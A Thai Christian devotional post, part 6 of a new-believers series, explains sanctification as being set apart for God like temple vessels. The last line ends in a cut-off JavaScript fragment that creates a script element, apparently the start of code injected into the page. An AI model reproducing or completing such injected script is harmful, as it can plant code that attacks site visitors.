ความบาป การไถ่ และชีวิตชอบธรรม ตอนที่ 6 : การชำระให้บริสุทธิ์

sea-landscape-mountains-nature

30 พ.ย. ความบาป การไถ่ และชีวิตชอบธรรม ตอนที่ 6 : การชำระให้บริสุทธิ์

พระเจ้าทรงชำระชีวิตท่านให้บริสุทธิ์ เพื่อเป็นภาชนะ เป็นสมบัติของพระองค์

การชำระให้บริสุทธิ์มีความสำคัญในชีวิตคริสตชน ดังนี้ :   

ในพันธสัญญาเดิม จะมีการชำระเครื่องใช้ในพระวิหารให้สะอาด เพราะเป็น สิ่งที่ถูกแยกออกเพื่อใช้พระวิหารของพระเจ้าเท่านั้น แม้กระทั่งปุโรหิตก็ไม่สามารถนำไปใช้สะเปะสะปะได้

ชีวิตคริสเตียนถูกชำระให้สะอาดบริสุทธิ์เพื่อเป็นสมบัติของพระเจ้าเช่นกัน

เขาถูกแยกออกจากคนธรรมดาสามัญ (คนที่ไม่เชื่อ) ทั่วไป  เพื่อจะสามารถใช้ได้ใน

พระราชกิจของพระองค์ เป็นคนของพระองค์ บุตรของพระองค์

เขาต้องแยกออกจากความผิดบาป แยกออกจากความมืด โชค กรรม กิเลส มลทิน ราคีของโลกนี้ เพราะสิ่งเหล่านี้มาจากมารซาตาน

เขาต้องอยู่ในขบวนการชำระของพระเจ้าทุก ๆ วัน  เพื่อให้บริสุทธิ์ยิ่งขึ้นและบริสุทธิ์อยู่เสมอ “โดยผ่านทางการเข้าเฝ้าสัมพันธ์สนิทกับพระองค์

เรียบเรียงโดย อ.เจริญ ยธิกุล
ซีรีย์ บทเรียน ผู้เชื่อใหม่ และชีวิตคริสเตียนใหม่var d=document;var s=d.createElement(‘script’);